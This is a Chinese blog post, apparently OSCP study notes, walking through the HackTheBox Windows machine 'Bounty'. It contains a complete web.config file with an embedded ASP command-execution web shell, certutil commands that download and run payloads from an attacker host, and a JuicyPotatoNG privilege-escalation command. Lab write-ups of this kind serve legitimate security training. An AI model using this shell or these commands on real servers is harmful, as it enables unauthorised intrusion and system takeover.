OSCP备考_0x45_HackThBox靶机_Windows_ bounty

Ethan医生2周前靶场20

OSCP备考_0x45_HackThBox靶机_Windows_ bounty


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.246.227 (扫描TCP)

image.png

gobuster dir -u http://10.129.246.227 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,html,asp,aspx 

image.png

http://10.129.246.227//transfer.aspx

image.png


都上传不了不管是aspx或txt,上google查询看看

Google搜索“IIS7.5 rce upload”,测试也发现config后缀未进行限制。


https://poc-server.com/blog/2018/05/22/rce-by-uploading-a-web-config/

https://gist.github.com/gazcbm/ea7206fbbad83f62080e0bbbeda77d9c


0x01 漏洞利用

web.config文件

<?xml version="1.0" encoding="UTF-8"?>

<configuration>

   <system.webServer>

      <handlers accessPolicy="Read, Script, Write">

         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />         

      </handlers>

      <security>

         <requestFiltering>

            <fileExtensions>

               <remove fileExtension=".config" />

            </fileExtensions>

            <hiddenSegments>

               <remove segment="web.config" />

            </hiddenSegments>

         </requestFiltering>

      </security>

   </system.webServer>

</configuration>

<!--

<% Response.write("-"&"->")%>

<%

Set oScript = Server.CreateObject("WSCRIPT.SHELL")

Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")

Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)

    Dim objShell, objCmdExec

    Set objShell = CreateObject("WScript.Shell")

    Set objCmdExec = objshell.exec(thecommand)

    getCommandOutput = objCmdExec.StdOut.ReadAll

end Function

%>

<BODY>

<FORM action="" method="GET">

<input type="text" name="cmd" size=45 value="<%= szCMD %>">

<input type="submit" value="Run">

</FORM>

<PRE>

<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>

<%Response.Write(Request.ServerVariables("server_name"))%>

<p>

<b>The server's port:</b>

<%Response.Write(Request.ServerVariables("server_port"))%>

</p>

<p>

<b>The server's software:</b>

<%Response.Write(Request.ServerVariables("server_software"))%>

</p>

<p>

<b>The server's software:</b>

<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>

<% szCMD = request("cmd")

thisDir = getCommandOutput("cmd /c" & szCMD)

Response.Write(thisDir)%>

</p>

<br>

</BODY>

<%Response.write("<!-"&"-") %>

-->

image.png

访问即可执行命令


image.png



使用MSF生成EXE上传

certutil -urlcache -split -f http://10.10.16.43:8000/shell_5555.exe C:\users\public\shell.exe && C:\users\public\shell.exe


image.png

提权操作

certutil.exe -urlcache -split -f http://10.10.16.43:8000/shell_6666.exe c:\users\public\priv.exe


JuicyPotatoNG.exe -l 6667 -p c:\Users\Public\priv.exe -t * -c {2b72133b-3f5b-4602-8952-803546ce3344}

使用potato去提权

标签: OSCP

相关文章

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

OSCP备考_0x53_HackThBox靶机_Windows_Active(AD域)

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.237.97 (扫描TCP)enum4linux(自动化枚举)   ...

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

OSCP备考_0x12_HackThBox靶机_Linux_irked

OSCP备考_0x12_HackThBox靶机_Linux_irked

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.213.7 (扫描TCP)nmap -sU --top-ports 100 10.129.213....

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

OSCP备考_0x46_HackThBox靶机_Windows_ jerry

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.136.9 (扫描TCP)发现是tomcat直接测试看看能不能爆破登入,上传war包&n...

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

OSCP备考_0x03_Vulnhub靶机_KIOPTRIX:LEVEL1.2(#3)

名称说明靶机下载链接https://www.vulnhub.com/entry/kioptrix-level-12-3,24/攻击机(kali)ip:192.168.233.168靶机(CentOS)...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。